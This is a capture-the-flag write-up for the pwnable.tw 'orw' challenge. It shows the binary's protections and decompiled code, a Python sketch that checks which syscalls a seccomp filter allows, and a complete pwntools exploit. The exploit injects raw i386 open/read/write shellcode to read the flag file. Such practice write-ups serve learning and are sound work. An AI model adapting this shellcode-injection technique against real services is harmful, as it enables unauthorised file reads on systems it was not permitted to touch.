[pwnable.tw] orw
lok2h4rd
2024. 1. 4. 22:24
checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
description
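int __cdecl main(int argc, const char **argv, const char **envp)
{
    orw_seccomp();                 // install the seccomp filter before any input is taken
    printf("Give my your shellcode:");
    read(0, &shellcode, 0xC8u);    // read up to 200 bytes into the global shellcode buffer
    (shellcode)();                 // jump to the bytes that were just read
    return 0;
}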
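The program reads shellcode from the user and executes it.
A seccomp filter is installed, and checking its rules shows that open, read, and write are allowed, so as the challenge name suggests, the solution is to write an orw (open/read/write) shellcode.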
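The rule check described above can be reproduced offline. This is an added example, not code from the original post: a minimal classic-BPF evaluator run over a constructed open/read/write allowlist. The filter, the helper names and the syscall subset are assumptions for illustration, not the challenge binary's actual filter.

```python
import struct

# Classic-BPF opcodes and seccomp constants (values from the Linux UAPI headers).
LD_W_ABS, JEQ_K, RET_K = 0x20, 0x15, 0x06
SECCOMP_RET_ALLOW, SECCOMP_RET_KILL = 0x7FFF0000, 0x00000000
AUDIT_ARCH_I386, AUDIT_ARCH_X86_64 = 0x40000003, 0xC000003E
# Small subset of the i386 syscall table, enough for the demonstration.
I386_NR = {1: "exit", 3: "read", 4: "write", 5: "open", 11: "execve", 125: "mprotect"}

def build_allowlist(arch, allowed):
    """Constructed sample filter: kill on wrong arch, allow listed numbers, kill the rest."""
    n = len(allowed)
    prog = [(LD_W_ABS, 0, 0, 4),            # A = seccomp_data.arch
            (JEQ_K, 0, n + 1, arch),        # wrong arch: skip ahead to the KILL return
            (LD_W_ABS, 0, 0, 0)]            # A = seccomp_data.nr
    prog += [(JEQ_K, n - i, 0, nr) for i, nr in enumerate(allowed)]  # hit: jump to ALLOW
    prog += [(RET_K, 0, 0, SECCOMP_RET_KILL), (RET_K, 0, 0, SECCOMP_RET_ALLOW)]
    return prog

def decode(raw):
    """Split raw struct sock_filter bytes (u16 code, u8 jt, u8 jf, u32 k) into tuples."""
    return list(struct.iter_unpack("<HBBI", raw))

def run_filter(prog, nr, arch, args=(0,) * 6):
    """Evaluate the filter on one seccomp_data record and return its action word."""
    data = struct.pack("<IIQ6Q", nr, arch, 0, *args)  # nr, arch, instruction_pointer, args[6]
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        pc += 1
        if code == LD_W_ABS:
            acc = struct.unpack_from("<I", data, k)[0]
        elif code == JEQ_K:
            pc += jt if acc == k else jf
        elif code == RET_K:
            return k
        else:
            raise ValueError(f"opcode {code:#x} is not handled by this sketch")

def allowed_syscalls(prog, arch, table=I386_NR):
    """Names from the table that the filter answers with SECCOMP_RET_ALLOW."""
    return sorted(name for nr, name in table.items()
                  if run_filter(prog, nr, arch) == SECCOMP_RET_ALLOW)

# Constructed sample: serialise the allowlist to raw bytes, then audit the decoded form.
RAW = b"".join(struct.pack("<HBBI", *ins) for ins in build_allowlist(AUDIT_ARCH_I386, [3, 4, 5]))
FILTER = decode(RAW)

if __name__ == "__main__":
    print(allowed_syscalls(FILTER, AUDIT_ARCH_I386))
```
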
exploit code
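from pwn import *

p = remote("chall.pwnable.tw", 10001)
ru = lambda a : p.recvuntil(a)

# read(0, 0x804a100, 0xf): read the flag path from stdin into a fixed buffer
sc = b"\xb8\x03\x00\x00\x00"    # mov eax, 3 (read)
sc += b"\xbb\x00\x00\x00\x00"   # mov ebx, 0 (stdin)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100
sc += b"\xba\x0f\x00\x00\x00"   # mov edx, 0xf
sc += b"\xcd\x80"               # int 0x80

# open(0x804a100): ecx/edx are not reloaded, so flags and mode are the values left by the read above
sc += b"\xbb\x00\xa1\x04\x08"   # mov ebx, 0x804a100
sc += b"\xb8\x05\x00\x00\x00"   # mov eax, 5 (open)
sc += b"\xcd\x80"               # int 0x80

# read(fd, 0x804a100, 0x50): read the file contents over the path buffer
sc += b"\x89\xc3"               # mov ebx, eax (fd returned by open)
sc += b"\xb8\x03\x00\x00\x00"   # mov eax, 3 (read)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100
sc += b"\xba\x50\x00\x00\x00"   # mov edx, 0x50
sc += b"\xcd\x80"               # int 0x80

# write(1, 0x804a100, 0x50): print the buffer to stdout
sc += b"\xb8\x04\x00\x00\x00"   # mov eax, 4 (write)
sc += b"\xbb\x01\x00\x00\x00"   # mov ebx, 1 (stdout)
sc += b"\xb9\x00\xa1\x04\x08"   # mov ecx, 0x804a100
sc += b"\xba\x50\x00\x00\x00"   # mov edx, 0x50
sc += b"\xcd\x80"               # int 0x80

sc += b"\x90" * (200 - len(sc)) # pad with NOPs to the full 0xC8 bytes main() reads

ru(b":")
p.send(sc)
sleep(0.1)                      # let the shellcode reach its first read before sending the path
p.send(b"/home/orw/flag\x00")   # 15 bytes, matching the 0xf-byte read
p.interactive()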